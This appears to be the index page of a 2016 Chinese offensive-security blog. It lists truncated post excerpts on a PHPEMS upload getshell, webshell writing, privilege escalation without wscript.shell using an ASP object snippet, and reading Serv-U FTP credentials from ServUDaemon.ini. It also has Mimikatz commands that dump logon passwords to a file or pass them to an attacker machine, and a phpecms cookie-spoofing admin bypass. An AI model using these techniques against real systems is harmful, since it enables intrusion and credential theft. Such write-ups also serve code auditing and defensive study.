热门 phpems最新版V3.1前台getshell

时间:2016-11-23   作者:webbaozi   分类: 代码审计   热度:1528°    
时间:2016-11-23   分类: 代码审计    热度:1528  
下载地址: http://www.mycodes.net/53/5773.htm 在测试过程中,发现可以截断上传,如下步骤。 首先注册一个账号,然后选择上传图片 跟进-文件document->api.php文件swfupload函数 $fileurl = $this->files->uploadFile($upfile,$path,NULL,NULL,$this->allowexts); 继续跟进uploadfile函数 文件lib/files/files.c...

阅读全文>>

热门 php网站web数据分离入侵姿势

时间:2016-11-20   作者:webbaozi   分类: web安全   热度:2734°    
时间:2016-11-20   分类: web安全    热度:2734  
情况一:php网站大多数配置mysql的数据库,如果web和数据库不分离root权限的话,一般也是读文件,爆路径,扫文件,读配置,最终目的是写shell或者能更直观的连接数据库!! 附: php爆路径的方法或者扫phpinfo():也跟下面差不多 如果扫到有phpmyadmin,直接登录就好, 如果要拿shell的话,实在拿不到shell就退而求其次,当没有phpmyadmin一类的时候 phpmyadmin 暴绝对路径:  1. 用Web路径自动盲爆工具 V2.0 乌云内测(带字典).rar 2.扫phpinfo.php  info....

阅读全文>>

热门 无wscript.shell组件提权

时间:2016-11-20   作者:webbaozi   分类: web安全   热度:1881°    
时间:2016-11-20   分类: web安全    热度:1881  
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。 要想让运行命令可以试试这种方法,成功率为五五之数。 把下面代码复制: <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runa...

阅读全文>>

热门 利用Serv-U获取ftp账号密码

时间:2016-11-13   作者:webbaozi   分类: 小技巧   热度:2058°    
时间:2016-11-13   分类: 小技巧    热度:2058  
1.可以读取文件 2.安装了Serv-U 在其Serv-U安装目录会有文件ServUDaemon.ini 拿其中一个举例: 格式为: [USER=baozi|1] 表示用户为baozi password=mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37表示ftp用户baozi的密码为“mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37”。   HomeDir=d:\wwwroot\zt828表示默认主目录为“d:\wwwroot\baozi...

阅读全文>>

热门 Mimikatz 使用Tips

时间:2016-11-11   作者:webbaozi   分类: 小技巧   热度:1831°    
时间:2016-11-11   分类: 小技巧    热度:1831  
 ps:以管理员身份运行 1.记录 Mimikatz输出:  C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件:  C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器:  Attacker执行:&nbs...

阅读全文>>

热门 phpecms1.3 cookies欺骗漏洞进后台

时间:2016-11-11   作者:webbaozi   分类: 代码审计   热度:1325°    
时间:2016-11-11   分类: 代码审计    热度:1325  
phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?> 判断如果没有admin_name的cookie就跳登录页面,如果admin_name就不跳了。 phpecms1.3/admin/cms_welcome.php <?php include('../system/inc.php');...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1